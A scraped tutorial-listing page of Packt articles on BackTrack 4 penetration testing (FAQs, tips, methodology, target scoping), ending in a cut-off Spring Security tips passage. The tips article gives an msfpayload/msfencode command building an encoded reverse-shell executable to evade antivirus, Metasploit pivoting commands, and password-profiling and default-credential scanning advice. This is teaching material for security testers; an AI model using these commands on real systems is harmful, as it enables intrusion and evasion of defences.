Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

172 Articles
article-image-faqs-backtrack-4
Packt
26 May 2011
8 min read
Save for later

FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Q: Which version of Backtrack is to be chosen? A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or using third-party mirrors like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/), you will find two different formats of BackTrack version 4 (recently BackTrack 5 is out and hence you may not find version 4 on the official site but the mirror sites like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/ still provide it). One is formatted in ISO image file. You can use this file format if you want to burn it to a DVD, USB, Memory Cards (SSD, SDHC, SDXC, etc) or want to install BackTrack directly to your machine. The second file format is VMWare image. If you want to use BackTrack in a virtual environment, you might want to use this image to speed up the installation and configuration.   Q: What is Portable BackTrack? A: You can also install BackTrack to a USB flash disk, we call this method Portable BackTrack. After you install it to the USB flash disk, you can easily boot up into BackTrack from any machine provided with USB port. The key advantage of this method compared to the Live DVD is that you can permanently save changes to the USB flash disk. When compared to the hard disk installation, this method is more portable and convenient. To create a portable BackTrack, you can use several tools including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com) and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for Windows, Linux/UNIX, and Mac operating system.   Q: How to install BackTrack in a dual-boot environment? A: One of the resources that describe how to install BackTrack with other operating systems such as Windows XP can be found at: http://www.backtrack-linux.org/tutorials/dual-boot-install/.   Q: What types of penetration testing tools are available under Backtrack 4? A: BackTrack 4 comes with number of security tools that can be used during the penetration testing process. These are categorized into the following: Information gathering: This category contains tools that can be used to collect information regarding target DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from the publicly available resources such as Internet, without touching the target environment. Network mapping: This category contains tools that can be used to assess the live status of the target host, fingerprint the operating system and, probe and map the applications/services through various port scanning techniques. Vulnerability identification: In this category you will find different set of tools to scan for vulnerabilities in various IT technologies. It also contains tools to carry out manual and automated fuzzy testing and analyzing SMB and SNMP protocols. Web application analysis: This category contains tools that can be used to assess the security of web servers and web applications. Radio network analysis: To audit wireless networks, Bluetooth and radio-frequency identification (RFID) technologies, you can use the tools in this category. Penetration: This category contains tools that can be used to exploit the vulnerabilities found in the target environment. Privilege escalation: After exploiting the vulnerabilities and gaining access to the target system, you can use the tools in this category to escalate your privileges to the highest level. Maintaining access: Tools in this category will be able to help you in maintaining access to the target machine. Note that, you might need to escalate your privileges before attempting to install any of these tools on the compromised host. Voice over IP (VOIP): In order to analyze the security of VOIP technology you can utilize the tools in this category. BackTrack 4 also contains tools that can be used for: Digital forensics: In this category you can find several tools that can be used to perform digital forensics and investigation, such as acquiring hard disk image, carving files, and analyzing disk archive. Some practical forensic procedures require you to mount the hard drive in question and swap the files in read-only mode to preserve evidence integrity. Reverse engineering: This category contains tools that can be used to debug, decompile and disassemble the executable file.   Q: Do I have to install additional tools with BackTrack 4? A: Although BackTrack 4 comes preloaded with so many security tools, however there are situations where you may need to add additional tools or packages because: It is not included with the default BackTrack 4 installation. You want to have the latest version of a particular tool which is not available in the repository. Our first suggestion is to try search the package in the software repository. If you find the package in the repository, please use that package, but if you can't find it, then you can get the software package from the author's website and install it by yourself. However, the prior method is highly recommended to avoid any installation and configuration conflicts. You can search for tools in the BackTrack repository using the apt-cache search command. However, if you can't find the package in the repository and you are sure that the package will not cause any problems later on, you can install the package by yourself.   Q: Why do we use the WebSecurify tool? A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in the web applications. It can be used to check for the following vulnerabilities: SQL injection Local and remote file include Cross-site scripting Cross-site request forgery Information disclosure Session security flaws WebSecurify is readily available from the BackTrack repository. To install it you can use the apt-get command: # apt-get install websecurify You can search for tools in the BackTrack repository using the apt-cache search command.   Q: What are the types of penetration testing? A: Black-box testing: The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. White-box testing: The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. Grey-Box testing: The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier.   Q: What is the difference between vulnerability assessment and penetration testing? A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is an expensive service when compared to vulnerability assessment   Q: Which class of vulnerability is considered to be the worst to resolve? A: "Design vulnerability" takes a developer to derive the specifications based on the security requirements and address its implementation securely. Thus, it takes more time and effort to resolve the issue when compared to other classes of vulnerability.   Q: Which OSSTMM test type follows the rules of Penetration Testing? A: Double blind testing   Q: What is an Application Layer? A: Layer-7 of the Open Systems Interconnection (OSI) model is known as the “Application Layer”. The key function of this model is to provide a standardized way of communication across heterogeneous networks. A model is divided into seven logical layers, namely, Physical, Data link, Network, Transport, Session, Presentation, and Application. The basic functionality of the application layer is to provide network services to user applications. More information on this can be obtained from: http://en.wikipedia.org/wiki/OSI_model.   Q: What are the steps for BackTrack testing methodology? A: The illustration below shows the BackTrack testing process. Summary In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently Further resources on this subject: Tips and Tricks on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 3784

article-image-tips-and-tricks-backtrack-4
Packt
26 May 2011
7 min read
Save for later

Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
  BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Read more about this book       (For more resources on this subject, see here.) Updating the kernel The update process is enough for updating the software applications. However, sometimes you may want to update your kernel, because your existing kernel doesn't support your new device. Please remember that because the kernel is the heart of the operating system, failure to upgrade may cause your BackTrack to be unbootable. You need to make a backup of your kernel and configuration. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to the BackTrack users and updating with other kernel versions could disable those features.   Multiple Customized installations One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (300MB to download) after you've installed it from the ISO or from the VMWare image provided. If you have one machine and a high speed Internet connection, there's nothing much to worry about. However, imagine installing BackTrack 4 in several machines, in several locations, with a slow internet connection. The solution to this problem is by creating an ISO image with all the upgrades already installed. If you want to install BackTrack 4, you can just install it from the newly created ISO image. You won't have to download the big upgrade again. While for the VMWare image, you can solve the problem by doing the upgrade in the virtual image, then copying that updated virtual image to be used in the new VMWare installation.   Efficient methodology Combining the power of both methodologies, Open Source Security Testing Methodology Manual (OSSTMM) and Information Systems Security Assessment Framework (ISSAF) does provide sufficient knowledge base to assess the security of an enterprise environment efficiently.   Can't find the dnsmap program In our testing, the dnsmap-bulk script is not working because it can't find the dnsmap program. To fix it, you need to define the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap). Edit the dnsmap-bulk.sh file using nano text editor and change the following: dnsmap $i elif [[ $# -eq 2 ]] then dnsmap $i -r $2 to ./dnsmap $i elif [[ $# -eq 2 ]] then ./dnsmap $i -r $2 and save your changes.   fierce Version Currently, the fierce Version 1 included with BackTrack 4 is no longer maintained by the author (Rsnake). He has suggested using fierce Version 2 that is still actively maintained by Jabra. fierce Version 2 is a rewrite of fierce Version 1. It also has several new features such as virtual host detection, subdomain and extension bruteforcing, template based output system, and XML support to integrate with Nmap. Since fierce Version 2 is not released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion check out command: #svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/ Make sure you are in the /pentest/enumeration directory first before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.   Relationship between "Vulnerability" and "Exploit" A vulnerability is a security weakness found in the system which can be used by the attacker to perform unauthorized operations, while the exploit is a piece of code (proof-of-concept or PoC) written to take advantage of that vulnerability or bug in an automated fashion.   CISCO Privilege modes There are 16 different privilege modes available for the Cisco devices, ranging from 0 (most restricted level) to 15 (least restricted level). All the accounts created should have been configured to work under the specific privilege level. More information on this is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.   Cisco Passwd Scanner The Cisco Passwd Scanner has been developed to scan the whole bunch of IP addresses in a specific network class. This class can be represented as A, B, or C in terms of network computing. Each class has it own definition for a number of hosts to be scanned. The tool is much faster and efficient in handling multiple threads in a single instance. It discovers those Cisco devices carrying default telnet password "cisco". We have found a number of Cisco devices vulnerable to default telnet password "cisco".   Common User Passwords Profiler (CUPP) As a professional penetration tester you may find a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials due to certain variable conditions, such as, the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. This all comes to guessing and breaking the password based on various password cracking techniques (dictionary or brute force method). CUPP is purely designed to generate a list of common passwords by profiling the target name, birthday, nickname, family member's information, pet name, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This activity serves as crucial input to the dictionary-based attack method while attempting to crack the target's e-mail account password.   Extract particular information from the exploits list Using the power of bash commands we can manipulate the output of any text file in order to retrieve meaningful data. This can be accomplished by typing in cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv. To learn the basic shell commands please refer to an online source at: http://tldp.org/LDP/abs/html/index.html.   "inline" and "stager" type payload An inline payload is a single self-contained shell code that is to be executed with one instance of an exploit. While the stager payload creates a communication channel between the attacker and victim machine to read-off the rest of the staging shell code to perform the specific task, it is often common practice to choose stager payloads because they are much smaller in size than inline payloads.   Extending attack landscape by gaining deeper access to the target's network that is inaccessible from outside Metasploit provides a capability to view and add new routes to the destination network using the "route add targetSubnet targetSubnetMask SessionId" command (for example, route add 10.2.4.0 255.255.255.0 1). The "SessionId" is pointing to the existing meterpreter session (also called gateway) created after successful exploitation. The "targetSubnet" is another network address (also called dual homed Ethernet IP-address) attached to our compromised host. Once you set a metasploit to route all the traffic through a compromised host session, we are then ready to penetrate further into a network which is normally non-routable from our side. This terminology is commonly known as Pivoting or Foot-holding.   Evading Antivirus Protection Using Metasploit Using a tool called msfencode located at /pentest/exploits/framework3, we can generate a self-protected executable file with encoded payload. This should be parallel to the msfpayload file generation process. A "raw" output from Msfpayload will be piped into Msfencode to use specific encoding technique before outputting the final binary. For instance, execute ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe to generate an encoded version of a reverse shell executable file. We strongly suggest you to use the "stager" type payloads instead of "inline" payloads, as they have a greater probability of success in bypassing major malware defenses due to their indefinite code signatures.   Stunnel version 3 BackTrack also comes with Stunnel version 3. The difference with Stunnel version 4 is that the version 4 uses a configuration file. If you want to run the version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments. Summary In this article we will take a look at some tips and tricks to make the best use of BackTrack OS. Further resources on this subject: FAQs on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 2011

article-image-backtrack-4-penetration-testing-methodologies
Packt
20 Apr 2011
14 min read
Save for later

BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap. This will provide practical ideas and proven practices which should be handled with great care in order to assess the system security correctly. Let's take a look at what this methodology looks like. It will help ensure you're using BackTrack effectively and that you're tests are thorough and reliable. Penetration testing can be carried out independently or as a part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, Microsoft SDLC). It is vital to notice that the security of a product not only depends on the factors relating to the IT environment, but also relies on product specific security's best practices. This involves implementation of appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. PenTesting is considered to be the last and most aggressive form of security assessment handled by qualified professionals with or without prior knowledge of a system under examination. It can be used to assess all the IT infrastructure components including applications, network devices, operating systems, communication medium, physical security, and human psychology. The output of penetration testing usually contains a report which is divided into several sections addressing the weaknesses found in the current state of a system following their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester to understand and critically analyze the integrity of current defenses during each stage of the testing process. Different types of penetration testing Although there are different types of penetration testing, the two most general approaches that are widely accepted by the industry are Black-Box and White-Box. These approaches will be discussed in the following sections. Black-box testing The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. An auditor dealing with black-box testing is also known as black-hat. It is important for an auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured according to the threat imposed by the vulnerability and the financial loss that would have occurred following a successful penetration. An ideal penetration tester would undermine any possible information that could lead him to compromise his target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into business context. White-box testing The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. An auditor engaged with white-box testing is also known as white-hat. It does bring more value to the organization as compared to the blackbox approach in the sense that it will eliminate any internal security issues lying at the target infrastructure environment, thus, making it more tightened for malicious adversary to infiltrate from the outside. The number of steps involved in white-box testing is a bit more similar to that of black-box, except the use of the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate any possible security issues at its early stage before they get disclosed and exploited by intruders. The time and cost required to find and resolve the security vulnerabilities is comparably less than the black-box approach. The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing, and the auditor engaged with gray-box testing is also known as grey-hat. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier. However, it does require an auditor with limited knowledge of an internal system to choose the best way to assess its overall security. On the other side, the external testing scenarios geared by the graybox approach are similar to that of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed and aware of the underlying technology. Vulnerability assessment versus penetration testing Since the exponential growth of an IT security industry, there are always an intensive number of diversities found in understanding and practicing the correct terminology for security assessment. This involves commercial grade companies and non-commercial organizations who always misinterpret the term while contracting for the specific type of security assessment. For this obvious reason, we decided to include a brief description on vulnerability assessment and differentiate its core features with penetration testing. Vulnerability assessment is a process for assessing the internal and external security controls by identifying the threats that pose serious exposure to the organizations assets. This technical infrastructure evaluation not only points the risks in the existing defenses but also recommends and prioritizes the remediation strategies. The internal vulnerability assessment provides an assurance for securing the internal systems, while the external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing process, tools, and techniques are followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved by using an integrated vulnerability management platform that manages an up-to-date vulnerabilities database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management. A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. This perception of an industry, while dealing with both of these assessment types, may confuse and overlap the terms interchangeably, which is absolutely wrong. A qualified consultant always makes an exception to workout the best type of assessment based on the client's business requirement rather than misleading them from one over the other. It is also a duty of the contracting party to look into the core details of the selected security assessment program before taking any final decision. Penetration testing is an expensive service when compared to vulnerability assessment. Security testing methodologies There have been various open source methodologies introduced to address security assessment needs. Using these assessment methodologies, one can easily pass the time-critical and challenging task of assessing the system security depending on its size and complexity. Some of these methodologies focus on the technical aspect of security testing, while others focus on managerial criteria, and very few address both sides. The basic idea behind formalizing these methodologies with your assessment is to execute different types of tests step-by-step in order to judge the security of a system accurately. Therefore, we have introduced four such well-known security assessment methodologies to provide an extended view of assessing the network and application security by highlighting their key features and benefits. These include: Open Source Security Testing Methodology Manual (OSSTMM) Information Systems Security Assessment Framework (ISSAF) Open Web Application Security Project (OWASP) Top Ten Web Application Security Consortium Threat Classification (WASC-TC) All of these testing frameworks and methodologies will assist the security professionals to choose the best strategy that could fit into their client's requirements and qualify the suitable testing prototype. The first two provide general guidelines and methods adhering security testing for almost any information assets. The last two mainly deal with the assessment of an application security domain. It is, however, important to note that the security in itself is an on-going process. Any minor change in the target environment can affect the whole process of security testing and may introduce errors in the final results. Thus, before complementing any of the above testing methods, the integrity of the target environment should be assured. Additionally, adapting any single methodology does not necessarily provide a complete picture of the risk assessment process. Hence, it is left up to the security auditor to select the best strategy that can address the target testing criteria and remains consistent with its network or application environment. There are many security testing methodologies which claim to be perfect in finding all security issues, but choosing the best one still requires a careful selection process under which one can determine the accountability, cost, and effectiveness of the assessment at optimum level. Thus, determining the right assessment strategy depends on several factors, including the technical details provided about the target environment, resource availability, PenTester's knowledge, business objectives, and regulatory concerns. From a business standpoint, investing blind capital and serving unwanted resources to a security testing process can put the whole business economy in danger. Open Source Security Testing Methodology Manual (OSSTMM) The OSSTMM is a recognized international standard for security testing and analysis and is being used by many organizations in their day-to-day assessment cycle. It is purely based on scientific method which assists in quantifying the operational security and its cost requirements in concern with the business objectives. From a technical perspective, its methodology is divided into four key groups, that is, Scope, Channel, Index, and Vector. The scope defines a process of collecting information on all assets operating in the target environment. A channel determines the type of communication and interaction with these assets, which can be physical, spectrum, and communication. All of these channels depict a unique set of security components that has to be tested and verified during the assessment period. These components comprise of physical security, human psychology, data networks, wireless communication medium, and telecommunication. The index is a method which is considerably useful while classifying these target assets corresponding to their particular identifications, such as, MAC Address, and IP Address. At the end, a vector concludes the direction by which an auditor can assess and analyze each functional asset. This whole process initiates a technical roadmap towards evaluating the target environment thoroughly and is known as Audit Scope. There are different forms of security testing which have been classified under OSSTMM methodology and their organization is presented within six standard security test types: Blind: The blind testing does not require any prior knowledge about the target system. But the target is informed before the execution of an audit scope. Ethical hacking and war gaming are examples of blind type testing. This kind of testing is also widely accepted because of its ethical vision of informing a target in advance. Double blind: In double blind testing, an auditor does not require any knowledge about the target system nor is the target informed before the test execution. Black-box auditing and penetration testing are examples of double blind testing. Most of the security assessments today are carried out using this strategy, thus, putting a real challenge for auditors to select the best of breed tools and techniques in order to achieve their required goal. Gray box: In gray box testing, an auditor holds limited knowledge about the target system and the target is also informed before the test is executed. Vulnerability assessment is one of the basic examples of gray box testing. Double gray box: The double gray box testing works in a similar way to gray box testing, except the time frame for an audit is defined and there are no channels and vectors being tested. White-box audit is an example of double gray box testing. Tandem: In tandem testing, the auditor holds minimum knowledge to assess the target system and the target is also notified in advance before the test is executed. It is fairly noted that the tandem testing is conducted thoroughly. Crystal box and in-house audit are examples of tandem testing. Reversal: In reversal testing, an auditor holds full knowledge about the target system and the target will never be informed of how and when the test will be conducted. Red-teaming is an example of reversal type testing. Which OSSTMM test type follows the rules of Penetration Testing? Double blind testing The technical assessment framework provided by OSSTMM is flexible and capable of deriving certain test cases which are logically divided into five security components of three consecutive channels, as mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during and after the test, and how to interpret and correlate the final results. Capturing the current state of protection of a target system by using security metrics is considerably useful and invaluable. Thus, the OSSTMM methodology has introduced this terminology in the form of RAV (Risk Assessment Values). The basic function of RAV is to analyze the test results and compute the actual security value based on three factors, which are operational security, loss controls, and limitations. This final security value is known as RAV Score. By using RAV score an auditor can easily extract and define the milestones based on the current security posture to accomplish better protection. From a business perspective, RAV can optimize the amount of investment required on security and may help in the justification of better available solutions. Key features and benefits Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides accurate measurement for the security. Its framework is adaptable to many types of security tests, such as penetration testing, white-box audit, vulnerability assessment, and so forth. It ensures the assessment should be carried out thoroughly and that of the results can be aggregated into consistent, quantifiable, and reliable manner. The methodology itself follows a process of four individually connected phases, namely definition phase, information phase, regulatory phase, and controls test phase. Each of which obtain, assess, and verify the information regarding the target environment. Evaluating security metrics can be achieved using the RAV method. The RAV calculates the actual security value based on operational security, loss controls, and limitations. The given output known as the RAV score represents the current state of target security. Formalizing the assessment report using the Security Test Audit Report (STAR) template can be advantageous to management, as well as the technical team to review the testing objectives, risk assessment values, and the output from each test phase. The methodology is regularly updated with new trends of security testing, regulations, and ethical concerns. The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislations. Additionally, a certified audit can also be eligible for accreditation from ISECOM (Institute for Security and Open Methodologies) directly.
Read more
  • 0
  • 0
  • 5662
Banner background image

article-image-backtrack-4-target-scoping
Packt
15 Apr 2011
9 min read
Save for later

BackTrack 4: Target scoping

Packt
15 Apr 2011
9 min read
What is target scoping? Target Scoping is defined as an empirical process for gathering target assessment requirements and characterizing each of its parameters to generate a test plan, limitations, business objectives, and time schedule. This process plays an important role in defining clear objectives towards any kind of security assessment. By determining these key objectives one can easily draw a practical roadmap of what will be tested, how it should be tested, what resources will be allocated, what limitations will be applied, what business objectives will be achieved, and how the test project will be planned and scheduled. Thus, we have combined all of these elements and presented them in a formalized scope process to achieve the required goal. Following are the key concepts which will be discussed in this article: Gathering client requirements deals with accumulating information about the target environment through verbal or written communication. Preparing test plan depends on different sets of variables. These may include shaping the actual requirements into structured testing process, legal agreements, cost analysis, and resource allocation. Profiling test boundaries determines the limitations associated with the penetration testing assignment. These can be a limitation of technology, knowledge, or a formal restriction on the client's IT environment. Defining business objectives is a process of aligning business view with technical objectives of the penetration testing program. Project management and scheduling directs every other step of the penetration testing process with a proper timeline for test execution. This can be achieved by using a number of advanced project management tools. It is highly recommended to follow the scope process in order to ensure test consistency and greater probability of success. Additionally, this process can also be adjusted according to the given situation and test factors. Without using any such process, there will be a greater chance of failure, as the requirements gathered will have no proper definitions and procedures to follow. This can lead the whole penetration testing project into danger and may result in unexpected business interruption. Paying special attention at this stage to the penetration testing process would make an excellent contribution towards the rest of the test phases and clear the perspectives of both technical and management areas. The key is to acquire as much information beforehand as possible from the client to formulate a strategic path that reflects multiple aspects of penetration testing. These may include negotiable legal terms, contractual agreement, resource allocation, test limitations, core competencies, infrastructure information, timescales, and rules of engagement. As a part of best practices, the scope process addresses each of the attributes necessary to kickstart our penetration testing project in a professional manner. As we can see in the preceding screenshot, each step constitutes unique information that is aligned in a logical order to pursue the test execution successfully. Remember, the more information that is gathered and managed properly, the easier it will be for both the client and the penetration testing consultant to further understand the process of testing. This also governs any legal matters to be resolved at an early stage. Hence, we will explain each of these steps in more detail in the following section. Gathering client requirements This step provides a generic guideline that can be drawn in the form of a questionnaire to devise all information about target infrastructure from a client. A client can be any subject who is legally and commercially bounded to the target organization. Such that, it is critical for the success of the penetration testing project to identify all internal and external stakeholders at an early stage of a project and analyze their levels of interest, expectations, importance, and influence. A strategy can then be developed for approaching each stakeholder with their requirements and involvement in the penetration testing project to maximize positive influences and mitigate potential negative impacts. It is solely the duty of the penetration tester to verify the identity of the contracting party before taking any further steps. The basic purpose of gathering client requirements is to open a true and authentic channel by which the pentester can obtain any information that may be necessary for the testing process. Once the test requirements have been identified, they should be validated by a client in order to remove any misleading information. This will ensure that the developed test plan is consistent and complete. We have listed some of the commonly asked questions that can be used in a conventional customer requirements form and the deliverables assessment form. It is important to note that this list can be extended or shortened according to the goal of a client and that the client must retain enough knowledge about the target environment. Customer requirements form Collecting company's information such as company name, address, website, contact person details, e-mail address, and telephone number. What are your key objectives behind the penetration testing project? Determining the penetration test type (with or without specific criteria): Black-box testing or external testing White-box testing or internal testing Informed testing Uninformed testing Social engineering included Social engineering excluded Investigate employees background information Adopt employee's fake identity Denial of Service included Denial of Service excluded Penetrate business partner systems How many servers, workstations, and network devices need to be tested? What operating system technologies are supported by your infrastructure? Which network devices need to be tested? Firewalls, routers, switches, modems, load balancers, IDS, IPS, or any other appliance? Is there any disaster recovery plan in place? If yes, who is managing it? Are there any security administrators currently managing your network? Is there any specific requirement to comply with industry standards? If yes, please list them. Who will be the point of contact for this project? What is the timeline allocated for this project? In weeks or days. What is your budget for this project? List any other requirements as necessary. Deliverables assessment form What types of reports are expected? Executive reports Technical assessment reports Developer reports In which format do you want the report to be delivered? PDF, HTML, or DOC. How should the report be submitted? E-mail or printed. Who is responsible for receiving these reports? Employee Shareholder Stakeholder By using such a concise and comprehensive inquiry form, you can easily extract the customer requirements and fulfill the test plan accordingly. Preparing the test plan As the requirements have been gathered and verified by a client, it is now time to draw a formal test plan that should reflect all of these requirements, in addition to other necessary information on legal and commercial grounds of the testing process. The key variables involved in preparing a test plan are a structured testing process, resource allocation, cost analysis, non-disclosure agreement, penetration testing contract, and rules of engagement. Each of these areas will be addressed with their short descriptions below: Structured testing process: After analyzing the details provided by our customer, it may be important to re-structure the BackTrack testing methodology. For instance, if the social engineering service was excluded then we would have to remove it from our formal testing process. This practice is sometimes known as Test Process Validation. It is a repetitive task that has to be visited whenever there is a change in client requirements. If there are any unnecessary steps involved during the test execution then it may result in a violation of the organization's policies and incur serious penalties. Additionally, based on the test type there would be a number of changes to the test process. Such that, white-box testing does not require information gathering and target discovery phase because the auditor is already aware of the internal infrastructure. Resource allocation: Determining the expertise knowledge required to achieve completeness of a test is one of the substantial areas. Thus, assigning a skilled penetration tester for a certain task may result in better security assessment. For instance, an application penetration testing requires a dedicated application security tester. This activity plays a significant role in the success of penetration testing assignment. Cost analysis: The cost for penetration testing depends on several factors. This may involve the number of days allocated to fulfill the scope of a project, additional service requirements such as social engineering and physical security assessment, and the expertise knowledge required to assess the specific technology. From the industry viewpoint, this should combine a qualitative and quantitative value. Non-disclosure Agreement (NDA): Before starting the test process it is necessary to sign the agreement which may reflect the interests of both parties "client" and "penetration tester". Using such a mutual non-disclosure agreement should clear the terms and conditions under which the test should be aligned. It is important for the penetration tester to comply with these terms throughout the test process. Violating any single term of agreement can result in serious penalties or permanent exemption from the job. Penetration testing contract: There is always a need for a legal contract which will reflect all the technical matters between the "client" and "penetration tester". This is where the penetration testing contract comes in. The basic information inside such contracts focus on what testing services are being offered, what their main objectives are, how they will be conducted, payment declaration, and maintaining the confidentiality of a whole project. Rules of engagement: The process of penetration testing can be invasive and requires clear understanding of what the assessment demands, what support will be provided by the client, and what type of potential impact or effect each assessment technique may have. Moreover, the tools used in the penetration testing processes should clearly state their purpose so that the tester can use them accordingly. The rules of engagement define all of these statements in a more detailed fashion to address the necessity of technical criteria that should be followed during the test execution. By preparing each of these subparts of the test plan, you can ensure the consistent view of a penetration testing process. This will provide a penetration tester with more specific assessment details that has been processed from the client requirements. It is always recommended to prepare a test plan checklist which can be used to verify the assessmnt criteria and its underlying terms with the contracting party.
Read more
  • 0
  • 0
  • 2033

article-image-spring-security-3-tips-and-tricks
Packt
28 Feb 2011
6 min read
Save for later

Spring Security 3: Tips and Tricks

Packt
28 Feb 2011
6 min read
  Spring Security 3 Make your web applications impenetrable. Implement authentication and authorization of users. Integrate Spring Security 3 with common external security providers. Packed full with concrete, simple, and concise examples. It's a good idea to change the default value of the spring_security_login page URL. Tip: Not only would the resulting URL be more user- or search-engine friendly, it'll disguise the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.   Evaluating authorization rules Tip: For any given URL request, Spring Security evaluates authorization rules in top to bottom order. The first rule matching the URL pattern will be applied. Typically, this means that your authorization rules will be ordered starting from most-specific to least-specific order. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top to bottom order, and you can easily find the correct rule in any scenario!   Using the JSTL URL tag to handle relative URLs Tip: : Use the JSTL core library's url tag to ensure that URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag will resolve URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques to do this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!   Modifying username or password and the remember me Feature Tip: You have anticipated that if the user changes their username or password, any remember me tokens 